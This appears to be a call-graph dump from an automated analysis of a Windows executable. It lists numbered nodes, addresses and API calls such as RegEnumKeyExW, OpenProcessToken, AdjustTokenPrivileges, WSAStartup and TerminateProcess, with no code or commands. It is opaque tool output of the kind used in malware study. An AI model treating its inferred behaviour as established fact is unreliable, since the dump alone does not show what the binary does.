33 API calls 41879->42045 41899->41668 41900->41413 41901->41420 41902->41323 41903->41338 41904->41348 41905->41344 41906->41363 41907->41365 41908->41394 41909->41398 41910->41401 41911->41405 41912->41408 41913->41412 41914->41278 41915->41285 41916->41292 41917->41297 41918->41347 41919->41357 41921 7ff7c170aa72 41920->41921 41924 7ff7c170aad9 ctype 41920->41924 41922 7ff7c170aa87 41921->41922 41923 7ff7c170ab53 Concurrency::cancel_current_task 41921->41923 41925 7ff7c170aae7 41921->41925 41922->41923 41926 7ff7c17421d4 std::_Facet_Register 5 API calls 41922->41926 41924->41378 41925->41924 41928 7ff7c17421d4 std::_Facet_Register 5 API calls 41925->41928 41927 7ff7c170aad4 41926->41927 41927->41924 41929 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41927->41929 41928->41924 41930 7ff7c170ab52 41929->41930 41930->41923 41932 7ff7c170accf 41931->41932 41935 7ff7c170ac8c ctype 41931->41935 42058 7ff7c170bff0 35 API calls 4 library calls 41932->42058 41934 7ff7c170ace2 41934->41378 41935->41378 41937 7ff7c1709520 35 API calls 41936->41937 41938 7ff7c172b76e 41937->41938 41982 7ff7c172bc40 244 API calls 41938->41982 41939 7ff7c172b779 41940 7ff7c172bba4 41939->41940 41942 7ff7c172a350 254 API calls 41939->41942 42062 7ff7c1709720 31 API calls 2 library calls 41940->42062 41943 7ff7c172b7ad 41942->41943 41943->41940 41945 7ff7c172b7b7 41943->41945 41944 7ff7c172b986 41946 7ff7c172b9be Concurrency::details::platform::DefaultWaiterPool::get_waiter 41944->41946 41977 7ff7c172bc26 41944->41977 41947 7ff7c17421d4 std::_Facet_Register 5 API calls 41945->41947 41948 7ff7c1742180 _handle_error 8 API calls 41946->41948 41950 7ff7c172b7c9 memcpy_s 41947->41950 41951 7ff7c172bc06 41948->41951 41949 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41952 7ff7c172bc2c 41949->41952 41953 7ff7c172b7eb RegEnumKeyExW 41950->41953 41951->41378 41954 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41952->41954 41978 7ff7c172b81f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41953->41978 41955 7ff7c172bc32 41954->41955 41959 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41955->41959 41956 7ff7c172b920 41957 7ff7c172b9df 41956->41957 41958 7ff7c172b930 41956->41958 41962 7ff7c172b9eb RegCloseKey 41957->41962 41981 7ff7c172b9f1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41957->41981 41960 7ff7c172b93c 41958->41960 41961 7ff7c172b935 RegCloseKey 41958->41961 41963 7ff7c172bc38 41959->41963 41964 7ff7c172b971 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41960->41964 41971 7ff7c172bc21 41960->41971 41961->41960 41962->41981 42063 7ff7c1713e30 33 API calls 41963->42063 42060 7ff7c1709720 31 API calls 2 library calls 41964->42060 41965 7ff7c1713f80 35 API calls 41965->41978 41966 7ff7c172bb05 41967 7ff7c172bb3c Concurrency::details::platform::DefaultWaiterPool::get_waiter 41966->41967 41966->41971 42061 7ff7c1709720 31 API calls 2 library calls 41967->42061 41975 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41971->41975 41973 7ff7c170aa20 35 API calls 41973->41981 41975->41977 41976 7ff7c172b8e6 RegEnumKeyExW 41976->41978 41977->41949 41978->41952 41978->41956 41978->41965 41978->41976 42059 7ff7c1710360 35 API calls 3 library calls 41978->42059 41979 7ff7c170ac70 35 API calls 41979->41981 41980 7ff7c172b710 254 API calls 41980->41981 41981->41955 41981->41963 41981->41966 41981->41973 41981->41979 41981->41980 41982->41939 41983->41357 41984->41357 41988 7ff7c171c603 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41986->41988 41987 7ff7c1742180 _handle_error 8 API calls 41989 7ff7c171c6f2 41987->41989 41988->41987 41989->41587 41991 7ff7c1740c18 13 API calls 41990->41991 41992 7ff7c1724487 41991->41992 42004 7ff7c17244da Concurrency::details::platform::DefaultWaiterPool::get_waiter 41992->42004 42055 7ff7c170c870 69 API calls 4 library calls 41992->42055 41994 7ff7c17246df 41996 7ff7c17247fd 41994->41996 42007 7ff7c1724716 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41994->42007 41995 7ff7c1740c18 13 API calls 41995->42004 41999 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41996->41999 41997 7ff7c1742180 _handle_error 8 API calls 41998 7ff7c172473c 41997->41998 41998->41611 41998->41619 41998->41654 42000 7ff7c1724803 41999->42000 42001 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42000->42001 42003 7ff7c1724809 42001->42003 42004->41994 42004->41995 42004->42000 42006 7ff7c172475d Concurrency::details::platform::DefaultWaiterPool::get_waiter 42004->42006 42056 7ff7c170c870 69 API calls 4 library calls 42004->42056 42057 7ff7c1719ec0 35 API calls 4 library calls 42004->42057 42006->42000 42006->42007 42008 7ff7c17247f8 42006->42008 42007->41997 42009 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42008->42009 42009->41996 42010->41595 42011->41600 42012->41651 42013->41667 42014->41675 42015->41650 42016->41654 42017->41693 42019->41695 42021->41707 42022->41787 42023->41785 42024->41732 42025->41740 42026->41761 42027->41772 42028->41798 42029->41833 42030->41753 42031->41765 42032->41826 42033->41817 42034->41794 42035->41802 42037->41807 42039->41796 42040->41810 42041->41857 42042->41805 42043->41823 42044->41838 42046->41747 42047->41767 42055->41992 42056->42004 42057->42004 42058->41934 42059->41978 42060->41944 42061->41944 42062->41944 42064->41436 42066->41441 42068 7ff7c174893f 42067->42068 42071 7ff7c17486c8 14 API calls 3 library calls 42068->42071 42070 7ff7c174895a GetCurrentProcess TerminateProcess 42071->42070 42072 7ff7c174c2fd 42073 7ff7c174c303 42072->42073 42076 7ff7c174c309 42072->42076 42074 7ff7c174c36a 42073->42074 42073->42076 42099 7ff7c174cf6c 31 API calls 2 library calls 42074->42099 42077 7ff7c174c32d 42076->42077 42079 7ff7c174c38d 42076->42079 42100 7ff7c174cda0 32 API calls 2 library calls 42076->42100 42077->42079 42082 7ff7c174c46f 42077->42082 42101 7ff7c174aeec 63 API calls 42077->42101 42080 7ff7c1742180 _handle_error 8 API calls 42079->42080 42081 7ff7c174c514 42080->42081 42086 7ff7c174c492 42082->42086 42102 7ff7c174d42c 42082->42102 42085 7ff7c174c4d8 42091 7ff7c174d280 42085->42091 42086->42085 42109 7ff7c174aeec 63 API calls 42086->42109 42092 7ff7c174d331 42091->42092 42093 7ff7c174d2a2 42091->42093 42094 7ff7c174d42c 63 API calls 42092->42094 42098 7ff7c174c4e2 42092->42098 42093->42092 42096 7ff7c174d2ad 42093->42096 42094->42098 42096->42098 42111 7ff7c1758a80 25 API calls 3 library calls 42096->42111 42112 7ff7c17599bc 42096->42112 42098->42079 42110 7ff7c174aeec 63 API calls 42098->42110 42099->42077 42100->42077 42101->42082 42103 7ff7c174d462 42102->42103 42106 7ff7c174d467 42102->42106 42288 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42103->42288 42105 7ff7c174d500 42105->42086 42106->42105 42108 7ff7c17599bc 63 API calls 42106->42108 42289 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42106->42289 42108->42106 42109->42085 42110->42079 42111->42096 42113 7ff7c17599ed 42112->42113 42114 7ff7c1759a06 42112->42114 42123 7ff7c17599f7 42113->42123 42167 7ff7c175c394 62 API calls _Wcrtomb 42113->42167 42139 7ff7c1759b38 42114->42139 42117 7ff7c1759a45 42117->42113 42124 7ff7c1759b38 31 API calls 42117->42124 42119 7ff7c1759b38 31 API calls 42121 7ff7c1759a29 42119->42121 42120 7ff7c1742180 _handle_error 8 API calls 42122 7ff7c1759b25 42120->42122 42121->42117 42126 7ff7c1759b38 31 API calls 42121->42126 42122->42096 42123->42120 42125 7ff7c1759a6e 42124->42125 42127 7ff7c1759a97 42125->42127 42129 7ff7c1759b38 31 API calls 42125->42129 42128 7ff7c1759a36 42126->42128 42127->42113 42130 7ff7c1759aad 42127->42130 42131 7ff7c1759b38 31 API calls 42128->42131 42132 7ff7c1759a7b 42129->42132 42145 7ff7c1758da4 42130->42145 42131->42117 42132->42127 42134 7ff7c1759b38 31 API calls 42132->42134 42135 7ff7c1759a88 42134->42135 42136 7ff7c1759b38 31 API calls 42135->42136 42136->42127 42137 7ff7c1759ac4 42137->42123 42148 7ff7c17520f8 42137->42148 42140 7ff7c1759a0e 42139->42140 42141 7ff7c1759b41 42139->42141 42140->42117 42140->42119 42168 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42141->42168 42143 7ff7c1759b46 42169 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42143->42169 42170 7ff7c1758c08 42145->42170 42149 7ff7c175c2a8 42148->42149 42150 7ff7c1752102 42148->42150 42151 7ff7c1759b38 31 API calls 42149->42151 42150->42137 42152 7ff7c175c2c4 42151->42152 42153 7ff7c175c2e8 42152->42153 42154 7ff7c175c2d0 42152->42154 42156 7ff7c175c2ff 42153->42156 42157 7ff7c175c2f2 42153->42157 42264 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42154->42264 42162 7ff7c175c30e 42156->42162 42266 7ff7c175c22c 33 API calls 42156->42266 42265 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42157->42265 42159 7ff7c175c36b 42275 7ff7c175c060 59 API calls 42159->42275 42162->42159 42163 7ff7c175c2d5 42162->42163 42165 7ff7c175c35f 42162->42165 42267 7ff7c17601a0 42162->42267 42163->42137 42165->42159 42259 7ff7c1760648 42165->42259 42167->42123 42168->42143 42169->42140 42171 7ff7c1758c2b 42170->42171 42172 7ff7c1758c65 42171->42172 42173 7ff7c1758c4f 42171->42173 42181 7ff7c1758c30 42171->42181 42197 7ff7c174aff8 42172->42197 42195 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42173->42195 42177 7ff7c1758c54 42196 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42177->42196 42179 7ff7c1758caf 42183 7ff7c1758cb9 42179->42183 42208 7ff7c175c480 WideCharToMultiByte 42179->42208 42180 7ff7c1758c81 42205 7ff7c175edcc 14 API calls _Wcrtomb 42180->42205 42181->42137 42187 7ff7c1758cc7 memcpy_s 42183->42187 42193 7ff7c1758d0d memcpy_s 42183->42193 42187->42181 42207 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42187->42207 42189 7ff7c1758c96 42189->42181 42206 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42189->42206 42192 7ff7c1758d93 42210 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42192->42210 42193->42181 42209 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42193->42209 42195->42177 42196->42181 42198 7ff7c174b01c 42197->42198 42199 7ff7c174b017 42197->42199 42198->42199 42211 7ff7c1753e64 GetLastError 42198->42211 42199->42179 42199->42180 42201 7ff7c174b037 42235 7ff7c1758db8 16 API calls _Toupper 42201->42235 42203 7ff7c174b05a 42236 7ff7c1758dec 16 API calls _Toupper 42203->42236 42205->42189 42206->42181 42207->42181 42209->42192 42210->42181 42212 7ff7c1753e86 42211->42212 42217 7ff7c1753e8b 42211->42217 42237 7ff7c1757e14 6 API calls try_get_function 42212->42237 42215 7ff7c1753eae 42216 7ff7c1753e93 SetLastError 42215->42216 42239 7ff7c1754fdc 42215->42239 42221 7ff7c1753f22 42216->42221 42217->42216 42238 7ff7c1757e5c 6 API calls try_get_function 42217->42238 42221->42201 42222 7ff7c1753edf 42253 7ff7c1757e5c 6 API calls try_get_function 42222->42253 42223 7ff7c1753ecf 42246 7ff7c1757e5c 6 API calls try_get_function 42223->42246 42226 7ff7c1753ed6 42247 7ff7c1755054 42226->42247 42227 7ff7c1753ee7 42228 7ff7c1753eeb 42227->42228 42229 7ff7c1753efd 42227->42229 42254 7ff7c1757e5c 6 API calls try_get_function 42228->42254 42255 7ff7c1753c14 14 API calls _invalid_parameter_noinfo 42229->42255 42233 7ff7c1753f05 42234 7ff7c1755054 __free_lconv_num 14 API calls 42233->42234 42234->42216 42235->42203 42236->42199 42238->42215 42244 7ff7c1754fed _invalid_parameter_noinfo 42239->42244 42240 7ff7c175503e 42257 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42240->42257 42241 7ff7c1755022 RtlAllocateHeap 42242 7ff7c1753ec1 42241->42242 42241->42244 42242->42222 42242->42223 42244->42240 42244->42241 42256 7ff7c17524d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42244->42256 42246->42226 42248 7ff7c1755059 HeapFree 42247->42248 42249 7ff7c1755089 __free_lconv_num 42247->42249 42248->42249 42250 7ff7c1755074 42248->42250 42249->42216 42258 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42250->42258 42252 7ff7c1755079 GetLastError 42252->42249 42253->42227 42254->42226 42255->42233 42256->42244 42257->42242 42258->42252 42276 7ff7c1755094 42259->42276 42262 7ff7c1755054 __free_lconv_num 14 API calls 42263 7ff7c1760672 42262->42263 42263->42159 42264->42163 42265->42163 42266->42162 42268 7ff7c17601a9 42267->42268 42269 7ff7c17601b6 42267->42269 42285 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42268->42285 42272 7ff7c17601ae 42269->42272 42286 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42269->42286 42272->42165 42273 7ff7c17601ed 42287 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42273->42287 42275->42163 42277 7ff7c17550df 42276->42277 42281 7ff7c17550a3 _invalid_parameter_noinfo 42276->42281 42284 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42277->42284 42279 7ff7c17550c6 RtlAllocateHeap 42280 7ff7c17550dd 42279->42280 42279->42281 42280->42262 42281->42277 42281->42279 42283 7ff7c17524d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 42281->42283 42283->42281 42284->42280 42285->42272 42286->42273 42287->42272 42288->42106 42289->42106 42290 7ff7c1723d1b AdjustTokenPrivileges 42291 7ff7c1723d4d GetLastError 42290->42291 42292 7ff7c1723d66 GetLastError CloseHandle 42290->42292 42291->42292 42293 7ff7c1723d57 CloseHandle 42291->42293 42294 7ff7c1723d7a Concurrency::details::platform::DefaultWaiterPool::get_waiter 42292->42294 42293->42294 42296 7ff7c1724412 42294->42296 42297 7ff7c1713f80 35 API calls 42294->42297 42309 7ff7c1723e78 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42294->42309 42350 7ff7c172440c 42294->42350 42295 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42295->42296 42299 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42296->42299 42300 7ff7c1723e48 42297->42300 42298 7ff7c1713f80 35 API calls 42301 7ff7c1723f4a 42298->42301 42303 7ff7c1724418 42299->42303 42304 7ff7c1713f80 35 API calls 42300->42304 42302 7ff7c1713f80 35 API calls 42301->42302 42305 7ff7c1723f77 GetCurrentProcess OpenProcessToken 42302->42305 42307 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42303->42307 42304->42309 42306 7ff7c1723f9a GetLastError 42305->42306 42311 7ff7c1724037 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42306->42311 42308 7ff7c172441e 42307->42308 42310 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42308->42310 42309->42298 42309->42303 42313 7ff7c17243dd 42309->42313 42312 7ff7c1724424 42310->42312 42311->42308 42311->42312 42314 7ff7c1713f80 35 API calls 42311->42314 42327 7ff7c17241d3 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42311->42327 42315 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42312->42315 42317 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42313->42317 42316 7ff7c1724105 42314->42316 42319 7ff7c172442a 42315->42319 42320 7ff7c1713f80 35 API calls 42316->42320 42322 7ff7c17243e2 42317->42322 42318 7ff7c1724314 42321 7ff7c1724331 42318->42321 42324 7ff7c173e4b0 91 API calls 42318->42324 42326 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42319->42326 42339 7ff7c1724135 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42320->42339 42328 7ff7c173e4b0 91 API calls 42321->42328 42333 7ff7c1724352 42321->42333 42338 7ff7c1724356 42321->42338 42329 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42322->42329 42323 7ff7c173e4b0 91 API calls 42323->42327 42324->42321 42325 7ff7c1724268 42325->42318 42332 7ff7c173e4b0 91 API calls 42325->42332 42325->42338 42330 7ff7c1724430 42326->42330 42327->42323 42327->42325 42327->42338 42328->42333 42331 7ff7c17243e8 42329->42331 42334 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42331->42334 42332->42325 42333->42338 42340 7ff7c172a350 258 API calls 42333->42340 42337 7ff7c17243ee 42334->42337 42335 7ff7c1742180 _handle_error 8 API calls 42336 7ff7c17243c0 42335->42336 42341 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42337->42341 42338->42335 42339->42313 42339->42319 42339->42327 42340->42338 42342 7ff7c17243f4 42341->42342 42343 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42342->42343 42344 7ff7c17243fa 42343->42344 42345 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42344->42345 42346 7ff7c1724400 42345->42346 42347 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42346->42347 42348 7ff7c1724406 42347->42348 42349 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42348->42349 42349->42350 42350->42295 42351 7ff7c17422fc 42374 7ff7c17424c8 42351->42374 42354 7ff7c174231d __scrt_acquire_startup_lock 42357 7ff7c174245d 42354->42357 42359 7ff7c174233b 42354->42359 42355 7ff7c1742453 42402 7ff7c1742e8c 7 API calls 2 library calls 42355->42402 42403 7ff7c1742e8c 7 API calls 2 library calls 42357->42403 42360 7ff7c1742360 42359->42360 42365 7ff7c174237d __scrt_release_startup_lock 42359->42365 42382 7ff7c1752e48 42359->42382 42361 7ff7c1742468 42363 7ff7c17423e6 42392 7ff7c1752df0 42363->42392 42365->42363 42401 7ff7c175318c 16 API calls __GSHandlerCheck_EH 42365->42401 42367 7ff7c17423eb 42398 7ff7c1701590 42367->42398 42404 7ff7c1743118 42374->42404 42377 7ff7c17424f7 42406 7ff7c17538c0 42377->42406 42379 7ff7c1742315 42379->42354 42379->42355 42383 7ff7c1752e7d 42382->42383 42384 7ff7c1752e97 42382->42384 42383->42384 42423 7ff7c17013f0 CreateMutexW CreateEventW CreateEventW 42383->42423 42424 7ff7c17426c4 42383->42424 42427 7ff7c1701130 42383->42427 42434 7ff7c1701030 InitializeCriticalSection 42383->42434 42438 7ff7c1701060 42383->42438 42442 7ff7c1701070 42383->42442 42446 7ff7c1701080 TlsAlloc 42383->42446 42384->42365 42393 7ff7c1752e00 42392->42393 42396 7ff7c1752e15 42392->42396 42393->42396 42483 7ff7c1752ad0 34 API calls __free_lconv_num 42393->42483 42395 7ff7c1752e1e 42395->42396 42484 7ff7c1752c90 15 API calls 3 library calls 42395->42484 42396->42367 42485 7ff7c17499a4 42398->42485 42400 7ff7c17015c4 42401->42363 42402->42357 42403->42361 42405 7ff7c17424ea __scrt_dllmain_crt_thread_attach 42404->42405 42405->42377 42405->42379 42407 7ff7c175d76c 42406->42407 42408 7ff7c17424fc 42407->42408 42411 7ff7c1758a04 42407->42411 42408->42379 42410 7ff7c1745020 7 API calls 2 library calls 42408->42410 42410->42379 42422 7ff7c174f264 EnterCriticalSection 42411->42422 42413 7ff7c1758a14 42414 7ff7c175d280 32 API calls 42413->42414 42415 7ff7c1758a1d 42414->42415 42416 7ff7c1758808 34 API calls 42415->42416 42421 7ff7c1758a2b 42415->42421 42418 7ff7c1758a26 42416->42418 42417 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42419 7ff7c1758a37 42417->42419 42420 7ff7c17588f8 GetStdHandle GetFileType 42418->42420 42419->42407 42420->42421 42421->42417 42454 7ff7c1742688 42424->42454 42426 7ff7c17426cd 42426->42383 42428 7ff7c17426c4 34 API calls 42427->42428 42429 7ff7c1701155 42428->42429 42430 7ff7c170117d 42429->42430 42431 7ff7c1701169 WSAStartup 42429->42431 42432 7ff7c1742180 _handle_error 8 API calls 42430->42432 42431->42430 42433 7ff7c170118d 42432->42433 42433->42383 42435 7ff7c17426c4 42434->42435 42436 7ff7c1742688 34 API calls 42435->42436 42437 7ff7c17426cd 42436->42437 42437->42383 42439 7ff7c17426c4 42438->42439 42440 7ff7c1742688 34 API calls 42439->42440 42441 7ff7c17426cd 42440->42441 42441->42383 42443 7ff7c17426c4 42442->42443 42444 7ff7c1742688 34 API calls 42443->42444 42445 7ff7c17426cd 42444->42445 42445->42383 42447 7ff7c1701093 GetLastError 42446->42447 42448 7ff7c17010a5 42446->42448 42478 7ff7c171aba0 43 API calls 42447->42478 42469 7ff7c171acd0 42448->42469 42451 7ff7c17010df 42452 7ff7c1742688 34 API calls 42451->42452 42453 7ff7c17426cd 42452->42453 42453->42383 42455 7ff7c17426a2 42454->42455 42457 7ff7c174269b 42454->42457 42458 7ff7c175374c 42455->42458 42457->42426 42461 7ff7c1753398 42458->42461 42468 7ff7c174f264 EnterCriticalSection 42461->42468 42463 7ff7c17533b4 42464 7ff7c1753410 34 API calls 42463->42464 42465 7ff7c17533bd 42464->42465 42466 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 42465->42466 42467 7ff7c17533c6 42466->42467 42467->42457 42479 7ff7c1712bd0 35 API calls 42469->42479 42471 7ff7c171acf8 42480 7ff7c1712c10 35 API calls 2 library calls 42471->42480 42473 7ff7c171ad29 42481 7ff7c171ac70 36 API calls 42473->42481 42475 7ff7c171ad45 42482 7ff7c171aca0 37 API calls Concurrency::cancel_current_task 42475->42482 42478->42448 42479->42471 42480->42473 42481->42475 42483->42395 42484->42396 42486 7ff7c17499d8 42485->42486 42487 7ff7c17499c4 42485->42487 42489 7ff7c1753e64 _Toupper 16 API calls 42486->42489 42520 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42487->42520 42491 7ff7c17499dd 42489->42491 42490 7ff7c17499c9 42521 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42490->42521 42499 7ff7c1758294 42491->42499 42494 7ff7c17499e6 42495 7ff7c1755954 _Toupper 16 API calls 42494->42495 42497 7ff7c17499eb 42495->42497 42496 7ff7c17499d4 42496->42400 42498 7ff7c1748f90 std::_Locinfo::_Locinfo_ctor 60 API calls 42497->42498 42498->42496 42522 7ff7c1757998 42499->42522 42502 7ff7c1757998 try_get_function 5 API calls 42503 7ff7c17582d3 42502->42503 42504 7ff7c1757998 try_get_function 5 API calls 42503->42504 42505 7ff7c17582f2 42504->42505 42506 7ff7c1757998 try_get_function 5 API calls 42505->42506 42507 7ff7c1758311 42506->42507 42508 7ff7c1757998 try_get_function 5 API calls 42507->42508 42509 7ff7c1758330 42508->42509 42510 7ff7c1757998 try_get_function 5 API calls 42509->42510 42511 7ff7c175834f 42510->42511 42512 7ff7c1757998 try_get_function 5 API calls 42511->42512 42513 7ff7c175836e 42512->42513 42514 7ff7c1757998 try_get_function 5 API calls 42513->42514 42515 7ff7c175838d 42514->42515 42516 7ff7c1757998 try_get_function 5 API calls 42515->42516 42517 7ff7c17583ac 42516->42517 42518 7ff7c1757998 try_get_function 5 API calls 42517->42518 42519 7ff7c17583cb 42518->42519 42520->42490 42521->42496 42523 7ff7c17579f9 42522->42523 42530 7ff7c17579f4 try_get_function 42522->42530 42523->42502 42524 7ff7c1757adc 42524->42523 42527 7ff7c1757aea GetProcAddress 42524->42527 42525 7ff7c1757a28 LoadLibraryW 42526 7ff7c1757a49 GetLastError 42525->42526 42525->42530 42526->42530 42528 7ff7c1757afb 42527->42528 42528->42523 42529 7ff7c1757ac1 FreeLibrary 42529->42530 42530->42523 42530->42524 42530->42525 42530->42529 42531 7ff7c1757a83 LoadLibraryExW 42530->42531 42531->42530 42532 7ff7c1723a5e AdjustTokenPrivileges 42533 7ff7c1723aa9 GetLastError CloseHandle 42532->42533 42534 7ff7c1723a90 GetLastError 42532->42534 42536 7ff7c1723abd Concurrency::details::platform::DefaultWaiterPool::get_waiter 42533->42536 42534->42533 42535 7ff7c1723a9a FindCloseChangeNotification 42534->42535 42535->42536 42537 7ff7c1724400 42536->42537 42539 7ff7c1713f80 35 API calls 42536->42539 42551 7ff7c1723bbb Concurrency::details::platform::DefaultWaiterPool::get_waiter 42536->42551 42595 7ff7c17243fa 42536->42595 42543 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42537->42543 42538 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42538->42537 42541 7ff7c1723b8b 42539->42541 42540 7ff7c1713f80 35 API calls 42542 7ff7c1723c8d 42540->42542 42544 7ff7c1713f80 35 API calls 42541->42544 42545 7ff7c1713f80 35 API calls 42542->42545 42546 7ff7c1724406 42543->42546 42544->42551 42547 7ff7c1723cba GetCurrentProcess OpenProcessToken 42545->42547 42549 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42546->42549 42548 7ff7c1723cdd GetLastError 42547->42548 42554 7ff7c1723d7a Concurrency::details::platform::DefaultWaiterPool::get_waiter 42548->42554 42550 7ff7c172440c 42549->42550 42552 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42550->42552 42551->42540 42551->42546 42555 7ff7c17243dd 42551->42555 42553 7ff7c1724412 42552->42553 42559 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42553->42559 42554->42550 42554->42553 42556 7ff7c1713f80 35 API calls 42554->42556 42576 7ff7c1723e78 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42554->42576 42558 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42555->42558 42560 7ff7c1723e48 42556->42560 42557 7ff7c1713f80 35 API calls 42561 7ff7c1723f4a 42557->42561 42563 7ff7c17243e2 42558->42563 42564 7ff7c1724418 42559->42564 42565 7ff7c1713f80 35 API calls 42560->42565 42562 7ff7c1713f80 35 API calls 42561->42562 42566 7ff7c1723f77 GetCurrentProcess OpenProcessToken 42562->42566 42568 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42563->42568 42569 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42564->42569 42565->42576 42567 7ff7c1723f9a GetLastError 42566->42567 42570 7ff7c1724037 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42567->42570 42571 7ff7c17243e8 42568->42571 42572 7ff7c172441e 42569->42572 42570->42572 42577 7ff7c1724424 42570->42577 42578 7ff7c1713f80 35 API calls 42570->42578 42601 7ff7c17241d3 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42570->42601 42573 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42571->42573 42574 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42572->42574 42575 7ff7c17243ee 42573->42575 42574->42577 42581 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42575->42581 42576->42555 42576->42557 42576->42564 42579 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42577->42579 42580 7ff7c1724105 42578->42580 42583 7ff7c172442a 42579->42583 42584 7ff7c1713f80 35 API calls 42580->42584 42586 7ff7c17243f4 42581->42586 42582 7ff7c1724314 42585 7ff7c1724331 42582->42585 42588 7ff7c173e4b0 91 API calls 42582->42588 42589 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42583->42589 42597 7ff7c1724135 Concurrency::details::platform::DefaultWaiterPool::get_waiter 42584->42597 42590 7ff7c173e4b0 91 API calls 42585->42590 42596 7ff7c1724352 42585->42596 42598 7ff7c1724356 42585->42598 42591 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 42586->42591 42587 7ff7c173e4b0 91 API calls 42587->42601 42588->42585 42594 7ff7c1724430 42589->42594 42590->42596 42591->42595 42592 7ff7c173e4b0 91 API calls 42593 7ff7c1724268 42592->42593 42593->42582 42593->42592 42593->42598 42595->42538 42596->42598 42602 7ff7c172a350 258 API calls 42596->42602 42597->42555 42597->42583 42597->42601 42599 7ff7c1742180 _handle_error 8 API calls 42598->42599 42600 7ff7c17243c0 42599->42600 42601->42587 42601->42593 42601->42598 42602->42598 42603 7ff7c171c780 42604 7ff7c171c7a6 42603->42604 42607 7ff7c174d5bc 42604->42607 42608 7ff7c174d5f7 42607->42608 42609 7ff7c174d5e2 42607->42609 42608->42609 42610 7ff7c174d5fc 42608->42610 42623 7ff7c174e1f8 14 API calls _invalid_parameter_noinfo 42609->42623 42616 7ff7c174a8ac 42610->42616 42613 7ff7c174d5e7 42624 7ff7c17488dc 31 API calls _invalid_parameter_noinfo 42613->42624 42615 7ff7c171c7bc 42625 7ff7c174a894 EnterCriticalSection 42616->42625 42618 7ff7c174a8c9 42619 7ff7c174b1dc 63 API calls 42618->42619 42620 7ff7c174a8d2 42619->42620 42621 7ff7c174a8a0 LeaveCriticalSection 42620->42621 42622 7ff7c174a8dc 42621->42622 42622->42615 42623->42613 42624->42615 42626 7ff7c171d304 42627 7ff7c171d310 42626->42627 42628 7ff7c171d65f LeaveCriticalSection 42626->42628 42627->42628 42629 7ff7c171d326 42627->42629 42667 7ff7c171d659 42628->42667 42630 7ff7c171d35b 42629->42630 42631 7ff7c171d330 GetSystemTimeAsFileTime 42629->42631 42632 7ff7c171d36f 42630->42632 42633 7ff7c171d35f GetCurrentThreadId 